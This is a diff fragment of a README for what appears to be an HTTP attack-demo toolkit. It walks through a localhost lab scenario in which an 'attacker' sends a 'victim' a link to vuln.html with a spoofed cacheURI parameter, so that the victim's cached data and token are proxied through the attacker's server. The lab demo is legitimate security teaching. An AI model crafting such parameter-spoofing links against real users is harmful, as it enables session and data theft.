aayla-secura/mixnmatchttp/README.md

 python3 simple.py -O -c -p 58081
 ```

+The "victim" has previously logged in at `http://localhost:58080/login`.
+The
-The "attacker" sends the "victim" the following link with a spoofed `cacheURI`:
+"attacker" sends the "victim" the following link with a spoofed `cacheURI`:

 ```
 http://localhost:58080/demos/evil_proxy/vuln.html?cacheURI=http%3a%2f%2f127.0.0.1:58081%2fgoto%2f%2fcache
 ```

+The data sent to the cache, as well as the action of the user clicking on the
+link to view the data, is proxied via the attacker, in an almost
+indistinguishable way:

 ![](demos/poc_evil_proxy_token.png)